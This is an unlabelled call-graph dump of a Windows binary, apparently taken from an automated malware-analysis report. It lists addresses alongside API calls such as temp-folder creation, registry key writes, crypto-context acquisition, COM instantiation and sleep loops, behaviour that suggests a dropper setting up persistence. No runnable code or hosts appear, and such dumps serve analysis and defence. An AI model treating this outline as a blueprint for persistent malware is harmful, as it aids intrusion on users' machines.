38786 405a1e 38784->38786 38787 405a27 38785->38787 38786->38607 38789 4107e2 GetSystemTimeAsFileTime 38787->38789 38818 405315 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38788->38818 38790 405a7f 38789->38790 38791 4106a2 39 API calls 38790->38791 38792 405a88 Sleep 38791->38792 38793 402730 43 API calls 38792->38793 38803 405aba 38793->38803 38795 402730 43 API calls 38795->38818 38796 402730 43 API calls 38846 405c80 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38796->38846 38798 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38798->38796 38798->38846 38799 4092d0 43 API calls 38799->38818 38802 401e20 44 API calls 38802->38818 38803->38798 40159 4025a0 41 API calls 38803->40159 38805 403a90 43 API calls 38805->38846 38806 4107b2 43 API calls 38806->38846 38807 40fb0d 15 API calls ___std_exception_copy 38807->38818 38808 409b4a 41 API calls 38808->38846 38809 405682 38811 40577c CoUninitialize 38809->38811 38810 4061c5 38812 406c20 53 API calls 38810->38812 38817 405792 38811->38817 38814 4061ec 38812->38814 38813 408c40 43 API calls 38813->38818 38819 402430 43 API calls 38814->38819 38821 4057ae CoUninitialize 38817->38821 38818->38775 38818->38795 38818->38799 38818->38802 38818->38807 38818->38809 38818->38813 38826 403410 41 API calls 38818->38826 38873 405687 38818->38873 40027 4035b0 CryptAcquireContextW 38818->40027 40051 402ec0 38818->40051 40156 409c85 6 API calls 38818->40156 40157 409f97 42 API calls 38818->40157 40158 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38818->40158 38823 4061fc 38819->38823 38830 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38821->38830 38827 402360 39 API calls 38823->38827 38824 4092d0 43 API calls 38824->38846 38826->38818 38829 406210 38827->38829 38828 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38831 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 38828->38831 38832 4062e5 38829->38832 38833 406218 38829->38833 38830->38775 38830->38828 38836 4058b6 38831->38836 40176 406ec0 53 API calls 2 library calls 38832->40176 38839 406288 38833->38839 38840 40622b 38833->38840 38834 401e20 44 API calls 38834->38846 38835 40cfaf 39 API calls 38835->38846 38836->38607 38838 4062ea 38844 402430 43 API calls 38838->38844 40171 406db0 53 API calls 2 library calls 38839->40171 40166 406ca0 53 API calls 2 library calls 38840->40166 38841 406192 Sleep 38841->38846 38848 4062fa 38844->38848 38845 406230 38850 402430 43 API calls 38845->38850 38846->38805 38846->38806 38846->38808 38846->38810 38846->38824 38846->38834 38846->38835 38846->38841 38849 402730 43 API calls 38846->38849 38854 40619e 38846->38854 38865 406c0b 38846->38865 38866 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38846->38866 40160 4025a0 41 API calls 38846->40160 40161 409c85 6 API calls 38846->40161 40162 409f97 42 API calls 38846->40162 40163 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 38846->40163 38847 40628d 38851 402430 43 API calls 38847->38851 38852 402360 39 API calls 38848->38852 38849->38846 38853 406240 38850->38853 38855 40629d 38851->38855 38857 40630e 38852->38857 40167 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38853->40167 40164 408c10 43 API calls 38854->40164 40172 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38855->40172 38862 4063e4 38857->38862 38863 406316 38857->38863 38860 4062a6 38867 402360 39 API calls 38860->38867 38861 4061aa 38868 402360 39 API calls 38861->38868 40185 407260 53 API calls 2 library calls 38862->40185 40177 406f40 53 API calls 2 library calls 38863->40177 38864 406249 38870 402360 39 API calls 38864->38870 38871 403c20 21 API calls 38865->38871 38866->38841 38875 4062ae 38867->38875 38876 4061b2 38868->38876 38878 406251 38870->38878 38879 406c10 38871->38879 38874 40571b Sleep 38873->38874 38884 40574a Sleep 38873->38884 40107 100010a3 38873->40107 40110 10001f20 38873->40110 38874->38809 38874->38873 40173 406e40 53 API calls 2 library calls 38875->40173 38882 402360 39 API calls 38876->38882 38877 40631b 38890 402430 43 API calls 38877->38890 40168 406d30 53 API calls 2 library calls 38878->40168 38880 4063e9 38888 402430 43 API calls 38880->38888 38886 4061ba 38882->38886 38884->38809 38885 4062b3 38894 402430 43 API calls 38885->38894 40165 4017d0 CoUninitialize 38886->40165 38887 406256 38893 402430 43 API calls 38887->38893 38891 4063f9 38888->38891 38892 40632b 38890->38892 38901 402360 39 API calls 38891->38901 40178 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38892->40178 38896 406266 38893->38896 38897 4062c3 38894->38897 40169 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38896->40169 40174 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38897->40174 38898 406334 38899 402360 39 API calls 38898->38899 38903 40633c 38899->38903 38905 40640d 38901->38905 40179 406fc0 53 API calls 2 library calls 38903->40179 38904 40626f 38908 402360 39 API calls 38904->38908 38909 4064ce 38905->38909 40186 4072e0 53 API calls 2 library calls 38905->40186 38906 4062cc 38910 402360 39 API calls 38906->38910 38912 406277 38908->38912 40194 407600 53 API calls 2 library calls 38909->40194 38915 4062d4 38910->38915 38911 406341 38921 402430 43 API calls 38911->38921 40170 408c10 43 API calls 38912->40170 40175 408c10 43 API calls 38915->40175 38917 40641a 38924 402430 43 API calls 38917->38924 38918 4064d8 38925 402430 43 API calls 38918->38925 38920 406283 38922 40686e 38920->38922 40232 402330 43 API calls 38920->40232 38923 406351 38921->38923 38927 401770 41 API calls 38922->38927 40180 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38923->40180 38929 40642a 38924->38929 38930 4064e8 38925->38930 38931 406881 38927->38931 40187 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38929->40187 38937 402360 39 API calls 38930->38937 38934 408380 53 API calls 38931->38934 38932 40635a 38935 402360 39 API calls 38932->38935 38938 40688a 38934->38938 38939 406362 38935->38939 38936 406433 38940 402360 39 API calls 38936->38940 38942 4064fc 38937->38942 38949 402430 43 API calls 38938->38949 40181 407040 53 API calls 2 library calls 38939->40181 38941 40643b 38940->38941 40188 407360 53 API calls 2 library calls 38941->40188 38945 4065e3 38942->38945 40195 407680 53 API calls 2 library calls 38942->40195 40205 407a20 53 API calls 2 library calls 38945->40205 38946 406367 38954 402430 43 API calls 38946->38954 38947 406440 38957 402430 43 API calls 38947->38957 38953 40689d 38949->38953 38951 4065ed 38959 402430 43 API calls 38951->38959 38952 406509 38961 402430 43 API calls 38952->38961 38955 408300 53 API calls 38953->38955 38956 406377 38954->38956 38958 4068a8 38955->38958 38965 402360 39 API calls 38956->38965 38960 406450 38957->38960 38968 402430 43 API calls 38958->38968 38962 4065fd 38959->38962 40189 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38960->40189 38964 406519 38961->38964 38976 402360 39 API calls 38962->38976 40196 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 38964->40196 38970 40638b 38965->38970 38966 406459 38971 402360 39 API calls 38966->38971 38969 4068bb 38968->38969 38973 408260 53 API calls 38969->38973 38974 4063ac 38970->38974 38975 40638f 38970->38975 38977 406461 38971->38977 38972 406522 38978 402360 39 API calls 38972->38978 38979 4068c6 38973->38979 40183 407150 53 API calls 2 library calls 38974->40183 40182 4070d0 53 API calls 2 library calls 38975->40182 38981 406611 38976->38981 40190 4073e0 53 API calls 2 library calls 38977->40190 38983 40652a 38978->38983 38994 402430 43 API calls 38979->38994 38986 406693 38981->38986 38987 406615 38981->38987 40197 407700 53 API calls 2 library calls 38983->40197 38985 406394 38999 402430 43 API calls 38985->38999 40212 407c40 53 API calls 2 library calls 38986->40212 40206 407ab0 53 API calls 2 library calls 38987->40206 38988 406466 39000 402430 43 API calls 38988->39000 38990 4063b1 38997 402430 43 API calls 38990->38997 38993 40652f 39002 402430 43 API calls 38993->39002 38998 4068d9 38994->38998 38995 406698 39008 402430 43 API calls 38995->39008 38996 40661a 39009 402430 43 API calls 38996->39009 39003 4063c1 38997->39003 39004 408d60 43 API calls 38998->39004 39005 4063a4 38999->39005 39001 406476 39000->39001 39016 402360 39 API calls 39001->39016 39006 40653f 39002->39006 39018 402360 39 API calls 39003->39018 39007 4068ee 39004->39007 40231 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39005->40231 40198 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39006->40198 39011 408dc0 43 API calls 39007->39011 39013 4066a8 39008->39013 39014 40662a 39009->39014 39019 406906 39011->39019 39027 402360 39 API calls 39013->39027 40207 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39014->40207 39022 40648a 39016->39022 39017 406548 39023 402360 39 API calls 39017->39023 39024 4063d5 39018->39024 39025 408e70 43 API calls 39019->39025 39020 406855 39020->38920 39026 402360 39 API calls 39020->39026 39021 406633 39028 402360 39 API calls 39021->39028 39029 406498 39022->39029 39030 40648e 39022->39030 39031 406550 39023->39031 39024->38920 40184 4071e0 53 API calls 2 library calls 39024->40184 39032 40691b 39025->39032 39026->38920 39033 4066bc 39027->39033 39034 40663b 39028->39034 40192 4074f0 53 API calls 2 library calls 39029->40192 40191 407470 53 API calls 2 library calls 39030->40191 40199 407780 53 API calls 2 library calls 39031->40199 39039 408dc0 43 API calls 39032->39039 39040 4066c0 39033->39040 39041 40673e 39033->39041 40208 407b30 53 API calls 2 library calls 39034->40208 39045 406933 39039->39045 40213 407cd0 53 API calls 2 library calls 39040->40213 40219 407e50 53 API calls 2 library calls 39041->40219 39043 406555 39054 402430 43 API calls 39043->39054 39044 40649d 39055 402430 43 API calls 39044->39055 39049 408e70 43 API calls 39045->39049 39048 406640 39057 402430 43 API calls 39048->39057 39050 406948 39049->39050 39053 408dc0 43 API calls 39050->39053 39051 406743 39061 402430 43 API calls 39051->39061 39052 4066c5 39062 402430 43 API calls 39052->39062 39056 406960 39053->39056 39058 406565 39054->39058 39059 4064ad 39055->39059 39060 402360 39 API calls 39056->39060 39063 406650 39057->39063 40200 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39058->40200 39070 402360 39 API calls 39059->39070 39065 40696e 39060->39065 39066 406753 39061->39066 39067 4066d5 39062->39067 40209 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39063->40209 39071 402360 39 API calls 39065->39071 39082 402360 39 API calls 39066->39082 40214 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39067->40214 39069 40656e 39074 402360 39 API calls 39069->39074 39076 4064c1 39070->39076 39077 406979 39071->39077 39073 406659 39079 402360 39 API calls 39073->39079 39075 406576 39074->39075 40201 407800 53 API calls 2 library calls 39075->40201 39076->38920 40193 407580 53 API calls 2 library calls 39076->40193 39081 402360 39 API calls 39077->39081 39078 4066de 39083 402360 39 API calls 39078->39083 39084 406661 39079->39084 39087 406984 39081->39087 39088 406767 39082->39088 39089 4066e6 39083->39089 40210 407bc0 53 API calls 2 library calls 39084->40210 39085 40657b 39100 402430 43 API calls 39085->39100 39091 402360 39 API calls 39087->39091 39092 40676b 39088->39092 39093 4067be 39088->39093 40215 407d50 53 API calls 2 library calls 39089->40215 39097 40698f 39091->39097 40220 407ee0 53 API calls 2 library calls 39092->40220 40225 408060 53 API calls 2 library calls 39093->40225 39095 406666 39104 402430 43 API calls 39095->39104 39102 402360 39 API calls 39097->39102 39099 4066eb 39107 402430 43 API calls 39099->39107 39105 40658b 39100->39105 39101 4067c3 39113 402430 43 API calls 39101->39113 39106 40699a 39102->39106 39103 406770 39110 402430 43 API calls 39103->39110 39108 406676 39104->39108 39118 402360 39 API calls 39105->39118 39109 402360 39 API calls 39106->39109 39111 4066fb 39107->39111 40211 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39108->40211 39114 4069a5 39109->39114 39115 406780 39110->39115 40216 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39111->40216 39119 4067d3 39113->39119 39120 402360 39 API calls 39114->39120 40221 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39115->40221 39117 40667f 39124 402360 39 API calls 39117->39124 39125 40659f 39118->39125 39134 402360 39 API calls 39119->39134 39121 4069b0 39120->39121 39126 402360 39 API calls 39121->39126 39123 406704 39128 402360 39 API calls 39123->39128 39124->38920 39129 4065a8 39125->39129 40202 407890 53 API calls 2 library calls 39125->40202 39170 4069bf 39126->39170 39127 406789 39131 402360 39 API calls 39127->39131 39132 40670c 39128->39132 40203 407910 53 API calls 2 library calls 39129->40203 39136 406791 39131->39136 40217 407dd0 53 API calls 2 library calls 39132->40217 39138 4067e7 39134->39138 39135 4065b2 39144 402430 43 API calls 39135->39144 40222 407f60 53 API calls 2 library calls 39136->40222 39138->38920 40226 4080e0 53 API calls 2 library calls 39138->40226 39140 406711 39146 402430 43 API calls 39140->39146 39142 406796 39148 402430 43 API calls 39142->39148 39143 4067f0 39150 402430 43 API calls 39143->39150 39145 4065c2 39144->39145 39154 402360 39 API calls 39145->39154 39149 406721 39146->39149 39147 406a1e Sleep 39147->39170 39151 4067a6 39148->39151 40218 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39149->40218 39153 406800 39150->39153 40223 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39151->40223 40227 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39153->40227 39159 4065d6 39154->39159 39156 40672a 39157 402360 39 API calls 39156->39157 39157->38920 39159->38920 40204 4079a0 53 API calls 2 library calls 39159->40204 39160 402430 43 API calls 39160->39170 39161 4067af 39162 402360 39 API calls 39161->39162 39164 4067b7 39162->39164 39163 406809 39165 402360 39 API calls 39163->39165 40224 407fe0 53 API calls 2 library calls 39164->40224 39168 406811 39165->39168 40228 408160 53 API calls 2 library calls 39168->40228 39170->39147 39170->39160 39171 406a27 39170->39171 39175 406a16 39170->39175 39172 402360 39 API calls 39171->39172 39174 406a2f 39172->39174 39173 406816 39181 402430 43 API calls 39173->39181 39177 408c40 43 API calls 39174->39177 39178 402360 39 API calls 39175->39178 39176 4067bc 39179 402430 43 API calls 39176->39179 39180 406a40 39177->39180 39178->39147 39179->39005 39182 408c40 43 API calls 39180->39182 39183 406826 39181->39183 40229 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39183->40229 39186 40682f 39188 402360 39 API calls 39186->39188 39190 406837 39188->39190 40230 4081e0 53 API calls 2 library calls 39190->40230 39245 40b530 __CreateFrameInfo 39244->39245 39246 403d7b GetTempPathA 39245->39246 39247 403db7 39246->39247 39247->39247 39248 402730 43 API calls 39247->39248 39256 403dd3 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39248->39256 39251 4092d0 43 API calls 39251->39256 39252 403f02 CreateDirectoryA Sleep 39253 403f30 __CreateFrameInfo 39252->39253 39252->39256 39258 409b4a 41 API calls 39253->39258 39254 404f20 39255 40cfaf 39 API calls 39254->39255 39257 404f43 39255->39257 39256->39251 39256->39252 39256->39254 40531 410681 39256->40531 40534 403c30 39256->40534 39259 4107e2 GetSystemTimeAsFileTime 39257->39259 39262 403f64 __CreateFrameInfo 39258->39262 39260 404f9f 39259->39260 39261 4106a2 39 API calls 39260->39261 39263 404fa8 __CreateFrameInfo 39261->39263 39267 40402b 39262->39267 40549 409c85 6 API calls 39262->40549 39266 409b4a 41 API calls 39263->39266 39265 403fe2 39265->39267 40550 409f97 42 API calls 39265->40550 39293 404ffc __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39266->39293 39269 402730 43 API calls 39267->39269 39271 4040a2 39269->39271 39270 40401e 40551 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39270->40551 39272 4092d0 43 API calls 39271->39272 39274 4040cd 39272->39274 39274->39254 39275 404147 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39274->39275 39280 404207 39275->39280 40552 409c85 6 API calls 39275->40552 39278 4041b1 39278->39280 40553 409f97 42 API calls 39278->40553 39282 402730 43 API calls 39280->39282 39281 402730 43 API calls 39281->39293 39285 404262 39282->39285 39288 4092d0 43 API calls 39285->39288 39286 4041fa 40554 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39286->40554 39287 4092d0 43 API calls 39287->39293 39290 404281 39288->39290 39292 401e20 44 API calls 39290->39292 39291 401e20 44 API calls 39291->39293 39300 404312 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39292->39300 39293->39281 39293->39287 39293->39291 39294 4052d0 Sleep 39293->39294 39295 4058bd 39293->39295 39299 402470 43 API calls 39293->39299 39306 4052e0 __CreateFrameInfo 39293->39306 40568 409c85 6 API calls 39293->40568 40569 409f97 42 API calls 39293->40569 40570 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39293->40570 39294->39293 39297 40cfaf 39 API calls 39295->39297 39296 4043e7 __CreateFrameInfo 39302 409b4a 41 API calls 39296->39302 39298 4058c2 RegCreateKeyExA RegOpenKeyExA RegSetValueExA RegCloseKey 39297->39298 39304 405964 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39298->39304 39299->39293 39300->39296 40540 4021f0 39300->40540 39312 40441b __CreateFrameInfo 39302->39312 39305 405a22 39304->39305 39307 405a0a std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39304->39307 39309 40cfaf 39 API calls 39305->39309 39314 409b4a 41 API calls 39306->39314 39308 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39307->39308 39310 405a1e 39308->39310 39311 405a27 39309->39311 39310->38608 39315 4107e2 GetSystemTimeAsFileTime 39311->39315 39317 4044fc 39312->39317 40555 409c85 6 API calls 39312->40555 39372 405315 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39314->39372 39318 405a7f 39315->39318 39316 4044a6 39316->39317 40556 409f97 42 API calls 39316->40556 39319 402730 43 API calls 39317->39319 39320 4106a2 39 API calls 39318->39320 39322 40455d 39319->39322 39323 405a88 Sleep 39320->39323 39325 4092d0 43 API calls 39322->39325 39326 402730 43 API calls 39323->39326 39324 4044ef 40557 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39324->40557 39333 404588 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39325->39333 39348 405aba 39326->39348 39329 402730 43 API calls 39329->39372 39331 402730 43 API calls 39417 405c80 __InternalCxxFrameHandler __CreateFrameInfo std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39331->39417 39339 4046c2 39333->39339 40558 409c85 6 API calls 39333->40558 39334 40466c 39334->39339 40559 409f97 42 API calls 39334->40559 39335 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39335->39331 39335->39417 39336 4092d0 43 API calls 39336->39372 39341 402730 43 API calls 39339->39341 39343 40471d 39341->39343 39342 4046b5 40560 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39342->40560 39344 4092d0 43 API calls 39343->39344 39347 40473c 39344->39347 39345 401e20 44 API calls 39345->39372 39351 401e20 44 API calls 39347->39351 39348->39335 40574 4025a0 41 API calls 39348->40574 39350 403a90 43 API calls 39350->39417 39354 4047cd std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39351->39354 39352 4107b2 43 API calls 39352->39417 39353 409b4a 41 API calls 39353->39417 39356 404d05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39354->39356 39357 4021f0 8 API calls 39354->39357 39355 405682 39359 40577c CoUninitialize 39355->39359 39365 404dc1 CoUninitialize 39356->39365 39361 4048b8 SHGetFolderPathA 39357->39361 39358 40fb0d 15 API calls ___std_exception_copy 39358->39372 39370 405792 39359->39370 39360 4061c5 39362 406c20 53 API calls 39360->39362 39361->39356 39363 4048d5 39361->39363 39366 4061ec 39362->39366 39373 40495a 39363->39373 40561 409c85 6 API calls 39363->40561 39364 408c40 43 API calls 39364->39372 39384 404dd1 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39365->39384 39374 402430 43 API calls 39366->39374 39369 4035b0 52 API calls 39369->39372 39378 4057ae CoUninitialize 39370->39378 39371 404911 39371->39373 40562 409f97 42 API calls 39371->40562 39372->39295 39372->39329 39372->39336 39372->39345 39372->39355 39372->39358 39372->39364 39372->39369 39376 402ec0 93 API calls 39372->39376 39398 403410 41 API calls 39372->39398 39448 405687 39372->39448 40571 409c85 6 API calls 39372->40571 40572 409f97 42 API calls 39372->40572 40573 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39372->40573 39377 402730 43 API calls 39373->39377 39379 4061fc 39374->39379 39376->39372 39389 4049bd 39377->39389 39391 4057bb std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39378->39391 39386 402360 39 API calls 39379->39386 39381 40494d 40563 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39381->40563 39382 4092d0 43 API calls 39382->39417 39387 404e42 CoUninitialize 39384->39387 39390 406210 39386->39390 39406 404e52 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39387->39406 39388 405895 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39392 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39388->39392 39409 4049f1 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39389->39409 40564 409590 43 API calls 4 library calls 39389->40564 39394 4062e5 39390->39394 39395 406218 39390->39395 39391->39295 39391->39388 39397 4058b6 39392->39397 40591 406ec0 53 API calls 2 library calls 39394->40591 39403 406288 39395->39403 39404 40622b 39395->39404 39396 40cfaf 39 API calls 39396->39417 39397->38608 39398->39372 39399 401e20 44 API calls 39399->39417 39401 4099d7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 39407 404f19 39401->39407 39402 4062ea 39414 402430 43 API calls 39402->39414 40586 406db0 53 API calls 2 library calls 39403->40586 40581 406ca0 53 API calls 2 library calls 39404->40581 39405 404bc3 CoInitialize CoCreateInstance 39405->39356 39439 404c68 39405->39439 39406->39401 39407->38608 39408 406192 Sleep 39408->39417 39409->39405 40565 409c85 6 API calls 39409->40565 39419 4062fa 39414->39419 39415 406230 39422 402430 43 API calls 39415->39422 39416 404b87 39416->39405 40566 409f97 42 API calls 39416->40566 39417->39350 39417->39352 39417->39353 39417->39360 39417->39382 39417->39396 39417->39399 39417->39408 39420 402730 43 API calls 39417->39420 39428 40619e 39417->39428 39440 406c0b 39417->39440 39441 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39417->39441 40575 4025a0 41 API calls 39417->40575 40576 409c85 6 API calls 39417->40576 40577 409f97 42 API calls 39417->40577 40578 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39417->40578 39418 40628d 39424 402430 43 API calls 39418->39424 39425 402360 39 API calls 39419->39425 39420->39417 39426 406240 39422->39426 39423 404bb6 40567 409c3b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 39423->40567 39429 40629d 39424->39429 39431 40630e 39425->39431 40582 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39426->40582 40579 408c10 43 API calls 39428->40579 40587 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39429->40587 39436 4063e4 39431->39436 39437 406316 39431->39437 39434 4062a6 39442 402360 39 API calls 39434->39442 39435 4061aa 39443 402360 39 API calls 39435->39443 40600 407260 53 API calls 2 library calls 39436->40600 40592 406f40 53 API calls 2 library calls 39437->40592 39438 406249 39445 402360 39 API calls 39438->39445 39459 404cb5 MultiByteToWideChar 39439->39459 39460 404ce3 CoUninitialize 39439->39460 39446 403c20 21 API calls 39440->39446 39441->39408 39450 4062ae 39442->39450 39451 4061b2 39443->39451 39453 406251 39445->39453 39454 406c10 39446->39454 39449 40571b Sleep 39448->39449 39461 40574a Sleep 39448->39461 39820 10001f20 75 API calls 39448->39820 39821 100010a3 CoUninitialize 39448->39821 39449->39355 39449->39448 40588 406e40 53 API calls 2 library calls 39450->40588 39457 402360 39 API calls 39451->39457 39452 40631b 39467 402430 43 API calls 39452->39467 40583 406d30 53 API calls 2 library calls 39453->40583 39455 4063e9 39465 402430 43 API calls 39455->39465 39463 4061ba 39457->39463 39459->39460 39460->39356 39461->39355 39462 4062b3 39471 402430 43 API calls 39462->39471 40580 4017d0 CoUninitialize 39463->40580 39464 406256 39473 402430 43 API calls 39464->39473 39469 4063f9 39465->39469 39470 40632b 39467->39470 39477 402360 39 API calls 39469->39477 40593 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39470->40593 39474 4062c3 39471->39474 39476 406266 39473->39476 40589 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39474->40589 39475 406334 39479 402360 39 API calls 39475->39479 40584 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39476->40584 39481 40640d 39477->39481 39483 40633c 39479->39483 39485 4064ce 39481->39485 40601 4072e0 53 API calls 2 library calls 39481->40601 39482 4062cc 39486 402360 39 API calls 39482->39486 40594 406fc0 53 API calls 2 library calls 39483->40594 39484 40626f 39488 402360 39 API calls 39484->39488 40609 407600 53 API calls 2 library calls 39485->40609 39490 4062d4 39486->39490 39492 406277 39488->39492 40590 408c10 43 API calls 39490->40590 39491 406341 39498 402430 43 API calls 39491->39498 40585 408c10 43 API calls 39492->40585 39494 40641a 39499 402430 43 API calls 39494->39499 39497 4064d8 39502 402430 43 API calls 39497->39502 39501 406351 39498->39501 39503 40642a 39499->39503 39500 40686e 39505 401770 41 API calls 39500->39505 40595 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39501->40595 39507 4064e8 39502->39507 40602 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39503->40602 39509 406881 39505->39509 39514 402360 39 API calls 39507->39514 39512 408380 53 API calls 39509->39512 39510 40635a 39513 402360 39 API calls 39510->39513 39511 406433 39515 402360 39 API calls 39511->39515 39516 40688a 39512->39516 39517 406362 39513->39517 39518 4064fc 39514->39518 39519 40643b 39515->39519 39525 402430 43 API calls 39516->39525 40596 407040 53 API calls 2 library calls 39517->40596 39745 4065e3 39518->39745 40610 407680 53 API calls 2 library calls 39518->40610 40603 407360 53 API calls 2 library calls 39519->40603 39522 406367 39530 402430 43 API calls 39522->39530 39524 406440 39533 402430 43 API calls 39524->39533 39529 40689d 39525->39529 39527 4065ed 39535 402430 43 API calls 39527->39535 39528 406509 39536 402430 43 API calls 39528->39536 39531 408300 53 API calls 39529->39531 39532 406377 39530->39532 39534 4068a8 39531->39534 39541 402360 39 API calls 39532->39541 39537 406450 39533->39537 39544 402430 43 API calls 39534->39544 39538 4065fd 39535->39538 39539 406519 39536->39539 40604 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39537->40604 39552 402360 39 API calls 39538->39552 40611 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39539->40611 39546 40638b 39541->39546 39543 406459 39548 402360 39 API calls 39543->39548 39545 4068bb 39544->39545 39549 408260 53 API calls 39545->39549 39550 4063ac 39546->39550 39551 40638f 39546->39551 39547 406522 39553 402360 39 API calls 39547->39553 39554 406461 39548->39554 39555 4068c6 39549->39555 40598 407150 53 API calls 2 library calls 39550->40598 40597 4070d0 53 API calls 2 library calls 39551->40597 39557 406611 39552->39557 39558 40652a 39553->39558 40605 4073e0 53 API calls 2 library calls 39554->40605 39570 402430 43 API calls 39555->39570 39562 406693 39557->39562 39563 406615 39557->39563 40612 407700 53 API calls 2 library calls 39558->40612 39561 406394 39574 402430 43 API calls 39561->39574 40627 407c40 53 API calls 2 library calls 39562->40627 40621 407ab0 53 API calls 2 library calls 39563->40621 39565 4063b1 39575 402430 43 API calls 39565->39575 39566 406466 39576 402430 43 API calls 39566->39576 39569 40652f 39579 402430 43 API calls 39569->39579 39573 4068d9 39570->39573 39571 406698 39582 402430 43 API calls 39571->39582 39572 40661a 39583 402430 43 API calls 39572->39583 39578 408d60 43 API calls 39573->39578 39760 4063a4 39574->39760 39580 4063c1 39575->39580 39577 406476 39576->39577 39590 402360 39 API calls 39577->39590 39581 4068ee 39578->39581 39584 40653f 39579->39584 39594 402360 39 API calls 39580->39594 39585 408dc0 43 API calls 39581->39585 39586 4066a8 39582->39586 39587 40662a 39583->39587 40613 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39584->40613 39591 406906 39585->39591 39605 402360 39 API calls 39586->39605 40622 4023b0 39 API calls std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 39587->40622 39596 40648a 39590->39596 39597 408e70 43 API calls 39591->39597 39593 406548 39599 402360 39 API calls 39593->39599 39600 4063d5 39594->39600 39595 406855 39601 402360 39 API calls 39595->39601 